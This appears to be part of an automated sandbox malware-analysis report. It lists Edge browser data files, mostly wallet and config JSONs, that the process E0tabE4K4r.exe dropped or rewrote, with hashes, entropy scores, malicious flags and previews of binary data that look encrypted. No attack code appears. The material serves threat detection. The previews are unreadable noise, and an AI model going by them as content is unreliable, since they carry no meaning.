                                                                                                                                                  Size (bytes):420
                                                                                                                                                  Entropy (8bit):7.4466612035975475
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:FURvuVbJSPQ2zapmErEv8pnq+9hnV93qzSUdNcii9a:uR2ePQdmEwUpnq8NV9R2bD
                                                                                                                                                  MD5:D92254C055FF01D9E1E8E0D6F4F3749E
                                                                                                                                                  SHA1:7F3EA105FF748CBE4CA486381BF0A5A73D693859
                                                                                                                                                  SHA-256:9F8DDA0AA472A1F07001ACCE496BCE4EE74215D98FF3213051D93892A0DA7E45
                                                                                                                                                  SHA-512:20E44703A62F3058C52A5269987B329BCAB355F93428FBD7357711687EFF546BBA8666D907A49211CA5D9F4E4B125BD01191DE1EE18BF14E0345E4C97995A39F
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:# Dis....5..Wc1u..i.gF.G.+.......~'..}-......r.7...e,:...Z.`..8i.o.~.3.gn..h.......5!...\,..I.F..]M^y}H. ..wr.e..j......p.Q..e..0...Br....Z...P..A...{....,..K..Y.......Rar.:.d.#......."R.4.+-.6]Qb4......F}F../.2..l.e~3.u...k..mJ..:....*.x....&w..A....J..5.&....K[l:.r...g.-.).....?...W..k.q...a.w...w.4<..k.rF.="oM..t.......mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\wallet\super_coupon.json

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):21010
                                                                                                                                                  Entropy (8bit):7.990927081120517
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:384:CWD2DjTRtrX/4g9MC2yhUmVTN/4VuTWyOe2rcZIHrf7J2IaX:ZUTzrXAg9MCE6JAoTFcrPzh8
                                                                                                                                                  MD5:E646CECEA220CA12E00D9ACF58ADEFDC
                                                                                                                                                  SHA1:5EC0E2E74031592792D06A5693FA8CE773F96DB0
                                                                                                                                                  SHA-256:3EDDE3603EFB633E5358CB96D03901D62CA64CB879093090B7AB178C47439484
                                                                                                                                                  SHA-512:D7149BE912D8ED2751551723464E248D9F56BB14F0F0333026FBEF06644215420A597542C73E644FA7CE34E36F214A080F567FEDF1565CE5C27A46AE6D2CE2A6
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:{. 0.+/.Q.Y>..D.....|.f...NS]....o.....-.......>c....B.)..,..T0.Z.W.N..]..iY..d.b..t....J?.k...&..=..P.....FX.Mp.c.....8....Ni}...'N.?....G(.bKU...R*......o.q..11..S..G[....(y........1..~nW.N.vP.......b-..R.....?S..^d?!4.%.;......G..-9.B.X].Y...#....e...qm.A...4..s.$...3....xg~GV`...q.d..:.....`,4T.$._.[.*5.?.x.?.t..e.../..q....`......e....}~t..r.......p.C.?...[...%/a..S.>............=E>......Q..A...0-..h...$...Ko2.....~e?N~0....H..K{l........"B..*..Lv.bT.'-.k..v....e.q.&{.....XM.]...f."...^....~.....A-!.....q...F.l.:|s;b...x...8r..c..A....;q..VT.h.....Q{.1..,f4.n.B.<....@..N..%..X..u.2(..A.._F.w*f.P.R.E?...J....d#..C.-..|.~!.r.!.D...:K...KE...:.v..x...%.-..'....*..Mvsx..$.%..y...t.*../:@.....|.c...R.M...A._..N.*../J28W#.P....`.Hk.@.`.w..x..\.gj.;U.....k...5,Dl...`2-..L.....".....Do..$.J!..|P..j..@.NNcR.yn.e....F(..e....8%..,......K.O!%..........c....%..d....X.......P5.Q..+Wf.*G...?....7.|.._.......y..C^mo.#..0V.........8i......

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\wallet\wallet-checkout-eligible-sites-pre-stable.json

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):148627
                                                                                                                                                  Entropy (8bit):7.998793279439047
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:3072:0FErCdXrSXDIWnZ2Woj7w+zWmjSUMjwQjMJ6VDj2j58p2KHi/ZBRJFXdL1dfSB7:0F7dEDIm2nhQUMsQ4JGqKJCvzFXdZ4x
                                                                                                                                                  MD5:6C05F1927B8988B2A816C0F6E841C9F6
                                                                                                                                                  SHA1:70B9688EF7498B93EA38F19E1C5504FDB5C8F9A5
                                                                                                                                                  SHA-256:3B07649E4087005B156C718F88EC6646C287E41142FC960D2201A83AA178C111
                                                                                                                                                  SHA-512:95AF21FB8F60C08BCE570E8E33466636CEEB8717DD8F0CAF30C44D37C6C0DAA190F3854804E670C6015E980C85D018E4C577B85ECF80BB785A6A3C7C05B0AD6E
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:{. ".i)...~G.s..0.........2Wy>."e.7.o.b..........5.h$..8...Pv.O..a.T......t=@=..?.;.T2...Sxq&..A.rj.1.P.8.......o.b~' .h$.....pN.LS.B..w"b/.i\.{!........Me...]....]....R........G._....u.&.=.\..o..w..=iU..f.(.......qM........K....Z.sN...y]`.@.....r.M.:.........1$.:..G9g.....Yh...q....5....~........`,7.e.SG9......T:...0..2....Sve.^....B;,.y(L..:..}..s.$.......Q.Z;.m...o..Y....S.[j.>Y..[.?...q..)....A&j.....Y0.$..[,....;./...\...jvM.L.~..xm.D.....strpt.#...1.........#@.!.~_.ME.*.].........Nl$.%/..d^.MW3.......=O..}....t.y......IuT/...w....];.L.D..../..j.g#.q...c..]...%.....+/i`..9S..j,y.W.g.G.R]....CE.0C.......*8.T.....5e.E5p@Dq\.H...6...8.;E....>q..h.N.A.,.P.'.k5..tm.Y...ha....E.K....].....D.......d....w_=...y..d`/.<.C....@.]....K.I".......;...w.8h.Z.+......~..*-@.*[".8./..se3.Ia...w...J.o.V0bml~.y..r.#t3R^....r4.p..S.=.=..7...^.%..Rd^.f.f.K...w&.]z.......l3.@.mH...O.o*H........a2ox...#......T..&P.9....F.x.0#.s....d...f....J.(

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\wallet\wallet-checkout-eligible-sites.json

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):511701
                                                                                                                                                  Entropy (8bit):6.019663031920717
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:6144:qFeA4GnbR7922iWb8Ddc4gmWH3+klkfzTOJHYUbHG+FZ8QTHNGs5AeCx:LpwhEWX4g6bfoGQ8+ee2
                                                                                                                                                  MD5:3CA16D0B0B60B3F98105B07AB523ED5A
                                                                                                                                                  SHA1:1F94D78B0F259393111996DC5DE4C3092DFFC826
                                                                                                                                                  SHA-256:0209A450EFD4C5406B25BC627E9E8E8395C9C99F9B78B6A470401A17E879C37D
                                                                                                                                                  SHA-512:7889BC50EE37C3A42FDBCCCB4C932577D350B48B100C2A759662B3884FE37E3C06E0E0C830CF1804046162913A370D452DC3223D8BDF7150B930EDC52CC6FFE8
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:{. A]@}F:.sV,".?mo.e..y.2.W.n.RI...w`.S.d..U..g&.&..).Y.F~.........=....km4...r?......'..{.{I.w..rx..dj...z5....hwmp.f....{...?{...AjL....+w.0. F.Y.../T.......h.~.t...%...o[...r...l9t...8Q.....I;.-.................0>..............<.j..>ey>a.....".g...d.....\1M....c........S....BN.(.i.iV.._.&6.y.B.}#uK.3..Y.<2......*.E...p!...B..j.@_.\.:@.q3X....6V.....h..6c...%...*.^..M....U.h.WG..%.5.,tA6.Z....m.8"kS.q.......u.X......p.F.q.9.Q..?..j.g....._.....s..tY...J...4zX.....r.-..R...S.g.A..w....z.u.`u?`...T1&..O.w@.0..=.@}...{~R)>Q.....#..l.ew.k...R.y|..!..3....)GG..&H../=P].(,.....i$....."..+........5.G'+..8&..:YL..E..D..S{......y*.......@/Bn.y....tX..2.. 5hC.~.......Q.Q.....X....~Y...Cs...Y o.....!tQ...0(...7.LX.h.6Dt).Qu.p.;.?m2.].y............N ....~.......C5"".=.t.....hKw...+..i.H.........t.dv....6.}..a........6*.W..#..qL...x.y4....N;\K..h.>..f...lG..#&>,/D|.I.1Zx..a.....V.X...l3..s......W.kn.3..?2w.......u.......2J1b]9.@L..c2.'B...{2..

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\wallet\wallet-notification-config.json

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1060
                                                                                                                                                  Entropy (8bit):7.8282584427528805
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:fFUoWViIgEg/kNgjeJ3K3p9A9XyIveGopTiBK2bD:ECXqdKZ9A9CI5BBD
                                                                                                                                                  MD5:841DE00BC991B9D67ADC74324CF24573
                                                                                                                                                  SHA1:1259B8C779410544EF00EC2DC6CD31D6164C7B55
                                                                                                                                                  SHA-256:7DDB8D746C56B70394113AF64642585B419417F465882A69C1BC8FC409F23C1A
                                                                                                                                                  SHA-512:0FB976CC85F8A92961D47EF4CECA602A50F21A602A1CB51DDD2E5CF35B551F1EDF764184C794D3762A091EBF0D6620A09F75AACB3ACB5BFC965628E4FFE56D9C
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:{. ".o/..."..'.g....J..E.U.[L.....^..8.>.....)...v#..8m..-y".zp....2..C.p<........Q..../..'.i2a....R.`.k.k)....E..'....u.s......L.hE..f...O....M.....h....O........7.l.!b._...q...v.h..^.J.0..'&/%...uV...l..........+..Fa..m.HZ.bB..P....w/E...[..25.......3..7a......c..7rdW.eLR)....Z.JI@....].9.....;.....s....S)..f.~G..9$....z.$..Y5....Uj.Q*....B.v9.8,;...(..l.)...B...Z....{.DR.3.c....~.N.a....'...])#u.....,z5..I................C,|L...1... ~.?..1'@..$....e#.V.,...!..p.....'a%.F.vk..H..}\..l..I...PL.`o{...Q..d...S......TC ..2n.g`Y..K.......?...W..{q%.C@.PW......Oj.;.y..4..K?...T}..<...Aq 1..[H6.6..L.RK..R....#v5?j..B...R....t.I(.j*.~.w.Y.w..#........S....x.w.n8.>........4.t...L..*x.L..=.o.."Q..T.5.o....8....k.R..}.L.f.L.V....}.:\..;.........).u..3Mc.:._...k....a....$.o2....f.0KfL.u....f.@.ja..i.93.*....B.*h.Hv..3.m...%..Q.cG.)r/,.\..I..MQg..[..V..I.Wu4Y.l:B.%u......=..~..U.9[..j....mi"..[\.~D<.<t....^.:u.>..h..~-...<mMsRxMUuXypapZbGOA

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\wallet\wallet-pre-stable.json

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2333839
                                                                                                                                                  Entropy (8bit):4.657500440601002
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:49152:cYvFYSiXPjpqxbq9emiTQuyg7oM2e8P/bzEN:ZL
                                                                                                                                                  MD5:E9885E32D46E52016C15789BCC9C6379
                                                                                                                                                  SHA1:5A1B09852C29030380C13E3338940F10B3A141F6
                                                                                                                                                  SHA-256:71CF2B266EAF5DEE0CF6888062C0513A2F0BCA194DC3EDBD27485DED700D02BF
                                                                                                                                                  SHA-512:CA26F6FE3179423BFBE804225CC0D65D406D5B34E55ECFCDE22258C31507B1E125FE02D1B575EB5556896D449C1AEA4D52255872D778124A19EA3F25E850ADB8
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:{. "^...cn..A..^.g..=#........&.G.E.3] ...Q....}.7u9.k...F..u...e.......A..E...cr<....D...'....RydR..h..=r....@Ye..rtF]..RW.^...r.q!.US....~.M.jS3.Uj.:L.Ii.....q!v..........9..1...?......R.w.%...k..tS.h@...f}.....73.Po.>...>....$.b...Ts..v.&.#:.~..X^..8{h....a..Pw9..e.2.X.\.....^.T.3..y.@..u....g]Q'..>K&.....U.9e...+..k3=..a....2..;G-B.X.r-...G[;.Rm.i....Rj.. .X.i.XU.x[..T....$...n.....(,.:.g....$..R......Y...!I.74..Y.#..e.......c.=4).E.0&.>...#].@.-.H..ds......f........[......E.9..F...6...?.e.....4..,....g9.4..)k..W.g$...@...<...O'.....}GB.q_..;.E..........<WC-.E.r.Z.\$.K.9.....Q.6;1..o/B.z.?.f....V.>Q.../....5...v..6xb...3y.K..dU5#PF^9S.~y....\A..o..F...',...Kb...A.M...~4t...?.M..9.+.Fh.....=............{.U....b.M...Xc.....*.F.<..o..........`P||.....@.........d..}A..>...../.cF...5p~A905..>QO....-"...o.'.u.<...F.5...r.i...F`F.a.H:.-K..!e..s.z..T.....[.0......|H.'8...F..y.l+V}........A=H.s.FD...A..kRQ.).".WI....R.R._,-...g"...

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\wallet\wallet-stable.json

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2333839
                                                                                                                                                  Entropy (8bit):4.657532007429929
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:49152:mFpcDFYSiXPjpqxbq9emiTQuyg7oM2e8P/bzEM:ey6
                                                                                                                                                  MD5:621BCFD2238C84D4C24021863CDEAE57
                                                                                                                                                  SHA1:51C04661735F975E214F6EB08FC437C0ACD119DB
                                                                                                                                                  SHA-256:958032A804C16327B3B3C90AF6A8E4FA4113A8E39EAB6586226E08657AC6ED1E
                                                                                                                                                  SHA-512:5960E94BC1EDD4D17C6D4B0AC159AF3DC04EC3B8E00AB9FEDA642BBC1070206D2D8E5B27E775CB7932A8A6E230607465D92FCEEAF3F7DFF53FA9B5D692C05759
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:{. "..<..2........l.SO0.-..\M.."..l(0....b..;,k...)....5...RN'AU1.X.!...O.....G..=..W..%.U....oo.}6.?M.EP.R%..F...b..8?D..+..0.E...0.jN.[P......@..q...........b..[....>hL.cJ...*....he..#..]rw..../<.....:.....Z..X.......MpV.(..u..'..8_M.%...ae'...7...#.7..>.?I:.q..R.!..P]..<.]...*M..4Bv.4.AE.:Fs..9.SNB.(...A..................fb.......s.#oHC..%o;`..x...$.w.A..^.]./.7.-......^......H.N..Et.4.7.4.........J%.2..l<.H.\3.Q..{...z.Rm........Dy.;..@...6#.............f.E........j..).0.3..Q...+.@.Z.D.f.....o.Z@.?a.:..m.?n..u....\..U.|......q.....\...F.....7G..{.U..N.&..W@f..<..cq.}.4.>x.2..Q`...5...=D4h....x,p^VTk.xL_.\.GG..."..."N.;K....j......IP.Ul... ..:R.D.......D'G.,..W.p..D...../.l...c.v.....]f.."..v....%.w.p.R.....0.I7.C.F...(.f_:."..a*..K.g.u..B....M...x;..V.`b.,.0....,....6fI.n.&.h0... Rg..*7.uo......2.p.I...........i.OG...E..*-bJ..0{.....K....uj#......;..(...w..:x.(..ZP..W.K..}...T....".{....;N...-I.}..T.nX.i..b-/...8=.n.d.H7C...~.....k..

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\wallet\wallet-tokenization-config.json

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):24582
                                                                                                                                                  Entropy (8bit):7.99062124310918
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:384:kRfKG1iKpZdV6xo/s0fyYyYCoyxa8Q+RiQZX1FZP+WNeicXpQoQomPDouYLQX:ufKG19zdVWyNfjyVosa8Q+Rrb57YiD5X
                                                                                                                                                  MD5:ADB05ACE975F2EAC75FEEB985ECFDCE8
                                                                                                                                                  SHA1:1DFAAC9B1700FDFA3692B2FDC078016F7069725D
                                                                                                                                                  SHA-256:0134E5556F2C370B0E33D425D838FBFA53FD75DD4C4E88869DB2B1429D817A42
                                                                                                                                                  SHA-512:5C114860C377C9947B4CCA8B806887D1C701275C0AE2CA2974D18F82E67B6AB93C8A9E15E83DDBBF4EB37E7ACE87B1E2981683A3C1C417E0B72732690B932524
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:{. ".,..Z.B.4^*@.H;(.i.......$G.u........{..Y.>..`.8...X..?.B..>..t.c.).jX$u.?.....|?*c.>..m..........?...Y.N1..C...l....I..6.`.F!............E(@..N.q....<x}mo.X.O@M...D./T..b/}4._.$..H.....D.%.~..5...*.[.....9...x........VZ.5%<\".e.1....u..W....IKh!..K%.G....p.b:xCB........Sy5.......<..'...n.C...8.b......A.......ld.tb..W...l.{..F......)Kn1.=.....!ZK...C..,.._.(....M.u.L.{.}..B4.G?8&......^hP/.....|~....\...U%.)...g.w......0+.(.iz....X..x..M/......."..>?#2%|..@...H..r.z..N...(......6.7.&E.......(...e.`.ef....] h...5.\.OR,..F@ .....GBm...R..cp.Y?...9.\...q..R6\.%...a...2MY..C.........V '..`...{)....Tl./.!>..6.E..s#W..-..L......]uy....$o....W.....K...Y..V........`D......*...z....;2?.........p7."....r.z.j.e....e.... ..~i...|.x..ya....#..G.A2xj`;S4.%.^i..^.c...0.X,.m...U..F,....%...+..8s..m.8.q.o.`dTM..I..).....&...{...:..1..9.o".....q-;D.c4.@u..,.Z....'..j_.@.....K...G...K.a.,.....;..y....DJ..$.5.u..i.,$..V.n.sf=....L..#....

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\FirstPartySetsPreloaded\2023.9.25.0\_metadata\verified_contents.json

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2198
                                                                                                                                                  Entropy (8bit):7.9014841019420405
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:Vl3yj1guA3MXJP02I1CgBT675hYPz72RZaXOJu6U713D:6ghsP0QgBT69yogXOJuz1z
                                                                                                                                                  MD5:B7841401DF7F4F18B9EE72AC5CE3CBF6
                                                                                                                                                  SHA1:01B6BBC25948FA5B76E45B49B0FC04D53CB11062
                                                                                                                                                  SHA-256:15F5C372B6D80EFCAC2C98C808432255DEEE12A6258FD00646735D04505D61B1
                                                                                                                                                  SHA-512:9C24A7BC7D93F4DB15DEAD0546BFDD968707258D36A29BF35DB37B308DD66317DAD9E96426BE2A6D67012AD44CDF67AE72E5350A86A0AC44360EC47797982AB1
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:[{"deY..Z.........9.3+.......3@../.8..G....@`.S5.....LG.<..'.h.z.?.m...........I..x.<W[.k*D.t........e.G...9..o.....o7...l.V......t..[....@].__....n...]...@......o%R.,..~*<..`.....sfx.q..i ..'.=w8.q..va.w....z.U....U..>*...f.V.2E.KCj...v.x....>.[..G ......I.v.+....lT.cr..`_"..|W..f".UWk.B&..z.....+.j9..l..I ...6.-2..9W.u4...p..5(..=N..}...._....`..5.D.......I.....F..<h. q~i.5.j8.....\..S.t..xy..".0l...X%y`../.....VH.$..Z.n......V......Y.....^3.cIE%O>.9.!..E....R.*z.j..e|.=.dl....C.F.m5..t..Z..S..".NP.PE........._......H....{.}...'...$..d\......*.3....r..(..&...0C.L].qG..;C.....:..&]...B}..ee..z...~\$..Vk..\...../6..(.X.s...9....[.D+.+.7.vy. ......W.....3ni<.f..6I5...^.h.q1....}..?8:..>.z.:...m..Bj.]S~..UG.9.B..+..q..#\...%...._...t.~.h..........9...)...K&..G.H._.....SO`...(-...{{..p'.=&....N`.?..B>.P..Q..cJ.>..'y....K..e.Bx.&..{...}..Y/{".......&.Uj....&lRm..$..... ...>...8......A.d...++}esm..c..D.@b...v.WM..nZ9a...Ac<|.. ..E.j...D.....pe....c

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SafetyTips\2983\_metadata\verified_contents.json

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2092
                                                                                                                                                  Entropy (8bit):7.900411821511329
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:niMT1gE3rfd6LGiWUrekTP/2suZEjNWRgWyHmqGhp4YrtD:niMT1gqWGiWUlTPOajNyRyypfrV
                                                                                                                                                  MD5:EF809D19AB2314A4D1CE27B984E7EA7D
                                                                                                                                                  SHA1:72AFA3F32B919C3D598F90D20168F1D3D1916709
                                                                                                                                                  SHA-256:7B1A506DA7462D50731E1B124E2ABF40463D41988513D58D31921751B8532162
                                                                                                                                                  SHA-512:D3EE4DD2A8879F30E6DAED7BD4A63CBC271E77D86E50310F0915E3A29831A2D4B05BC534FC834B9E8E1EEA5D75C342DE125E1E6B0AA021D48A6669477ADB3F72
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:[{"deC..J..-..s..J.....o.:.\......[.K...Z.O.......e.A..]c.k.}.....).*..4...w4'"R.Uwp.....-.3Px.w...D..b..:..O..v.).TS...H.B.....zn8g.....$n.QG.>..;..u.&g.@.q-.....C8>1.....J!.......5V.......1mZN'.?H.0...w....... l..H.#...G...B..@..z.....r..l..s|..7..._.-N..R2...{i(.Fi...B*.....![.(>$.&.k.y..$*..;q...M.....s0..r".t.aI..hw....YC.Rih[pc...q..v.Z.)..@L/.3.k..f...>l!.q.xL.....7>8......H..T.6..9..=Jf$,T...P.....l.>B.V2.6T.C{a[n.O..>.a.ref......MT^J|....XZ....#....#.S..aF.$+...XW.}.<iS........F.`..dVz.#.....(..'.A.A..h.v7^...4.h..f.xUg.....U].......p:.....o..pD.%..?_.-U@.E4.C.....^.cp...X..t.1..:...4A.!C|E..r..|,.}.}..6.....0!f.YR].]..y..ETJ.....?...+.....4l.A....qD.7.4D..p..CK1.u^M!....P.9. ..R.5ds...~.'.]d....T.1...JF~.o,...:..6.......l....W.D/.w..y.E..{.r.Bg.Q.<.-...q.x...q4....Q...zf.4.n.=..P....:.v.F.1.o..4>q..-ed..J..N.^P. ...+..O..5G......D...RB..t..\*o....8|*.f.e7.`.M...|.,....;....<<.*N.v.K...C..F.dex..k..[*7..Y..].T ....^T"=...i.1E:bW..

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\Unindexed Rules\10.34.0.50\adblock_snippet.js

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2649
                                                                                                                                                  Entropy (8bit):7.918655569451996
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:vqWNr+lYrYhuTgCq3NOnrR6xAti5QgdR22smJQqiVeO3WyBkwRuHy1GV27KD:JraYrJT5q9OrQAtCBBiqEPWyZuSIVAC
                                                                                                                                                  MD5:4C4598E34DAF4980E67D7538A356ECEC
                                                                                                                                                  SHA1:56BBACCEDBA746D075B6249CE77BE4AADE94DC03
                                                                                                                                                  SHA-256:15DD40220E77D80A7B5C23F5AB0EDD9A68FAB1368FECF05495BAC14BB0B461EA
                                                                                                                                                  SHA-512:CDC4E496B90811F6628853467F6BC777DF78ECE37A47DA35AEA3DE84DD4D092B50B0336FDB3C0145B395D459D3CDD6637CBE41BF21D23908EC5369B5C4AD1A03
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:(()=>.....-@X..u?x..F..2c.G.......OZ....oq.Y.H.-....~...Q.*..m8..s.j.K.R8..k...4.....7.5.n!..6....m...!vM.n0k-#..g#p.p..<1...(..q.h..?<[.T.......0s......j.s[.S.?......R`....(\.<e.#(P.0x.._.-....3t....K.....n......f?..d.C*oH...U....x.9.....9L....a>...$......t..5.i.....Y..Y....xa..".K..BkT.v.....,.)C[...Q~.Z ....T]..a..#.B.s.{.A.+.......'<.......$?......F.dhx.55....b.}'....(a..R}..r...z..&).D..G......}...vx..1.a..Z./j)/..J.D\......../.8..O.3...z.51...tDpE^.e......'!..b.X..T....&H.6........lZH..$].=.X..+.E..\...L.mP...8.V[...zs{4...t.<#...,.Y.".m...Z......c.).-C..."N%;....J.-.. ....k......0.t.'..$....&B....|.FHv......"v....w.....qL..X...C....:.Z.B..E.../..v.b&G...<....Nd....R.R..)8!..jL .......W...'...i.A.....:.... m.h....R"...H....l;Z....k\s(...]f.........j......!..(...n.w..A.G:>.Ai.2..R.l.**0....eTOG7(.X....QQ."..|.k.........X....s..U..KBy(....k'x_.....ui..6[.=.2.w......rI....u...}!...x.h!Sv..e....=.....).v...*nG..v.n...).`...<.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\Unindexed Rules\10.34.0.50\manifest.fingerprint

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):400
                                                                                                                                                  Entropy (8bit):7.408658926218877
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:QQ/rLLj1T8DZ2lvHqRoV79THwOsNSUdNcii9a:FT+D81HuoV79bwO32bD
                                                                                                                                                  MD5:895322CA920C157AA6471AFBE0C0D235
                                                                                                                                                  SHA1:52C77E2FA872AAE415403006BBA86090B180F1CB
                                                                                                                                                  SHA-256:2930CDA253B34C325189603EC47FC99666324D22607B12C1D9516C039C09B7A5
                                                                                                                                                  SHA-512:649DA3A1410FF59C098CCEDFCBEEFB10276494C99708A333BE186C530081BD0E09EBDAF7F9926FE300AB10EAA40F48DB4BDE5993C543C4422C5C7DB16D8A4024
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:1.2F9n...........r.4fH.:.~......AuL.3....(..&...1.D}7.u.......3N:"....-.{.^_...YZ.wB......e..<+l^!+).]g<.c.H^,j+,..Q...D.K.x#..zw...c.TZI....j}r...7...:]Wf..{.a.Vk.F3.....{...F.(.U....M....`............t.\O..V...X......^..F.i.\..c#J.......sc.f....9a_..'f......G.N..z..Yv./.D........|m...!.......\..F2.+;..mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\Unindexed Rules\10.34.0.50\manifest.json

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):450
                                                                                                                                                  Entropy (8bit):7.4641010961455025
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:6Q5OsQBUNjO6VJ57UKcbXUv0Tz6xaFX5WSUdNcii9a:6KJ357UKcov0X6x4n2bD
                                                                                                                                                  MD5:95C16DDCE33222BCEC9F286369B4E5E2
                                                                                                                                                  SHA1:F850453307BBB2B3F34F97E89CEFC69382C75948
                                                                                                                                                  SHA-256:8CDF2E019FC8F9E1C6FC8685CE04BC5ADDCF0641603F9EF3454D0D25B4B8F559
                                                                                                                                                  SHA-512:ACA435C6A54C744FCF6AE18A35722F67AC333FE682B5968DE8ACB3B70C706D72CCD81378562181458DE79526B82E0ACA1E7A24FD65D1673B3C963BD4B1B581DC
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:{. "[..wh86..u...0.E.8....#...y....GW.._.....O.c.i`.V[.6..I.z\`.P.J..qa.1..d.9K/.!f.Gw2.....m.`.W.C-.8q.@..)\.>..cW..O.)......#....<...Y..2.Q..A.........^.......Z..}s..#.9.y.....Y..Qp....../).,..r.....Q/....XS?.....G.lBHA.'.~]D. ;HR.8\<.c...E.A3`..,iS....;>...}.........>JA..j...,.Q.G@.2.rE..%...............#...h{..4..|EYb..NwJ#..zod.,X.0_|...{.`..mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\TrustTokenKeyCommitments\2023.9.4.1\_metadata\verified_contents.json

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2196
                                                                                                                                                  Entropy (8bit):7.916114333633766
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:BMeNlOyhKzjHh+d0NkBGn1yfEqHkO05oRtwy8qdLgT5D:Bnsnh++0XECP02RgeLgN
                                                                                                                                                  MD5:74113846D6756A463CEE82E4D55726AD
                                                                                                                                                  SHA1:D3255DD6F35629987DB05956D66251E560535F61
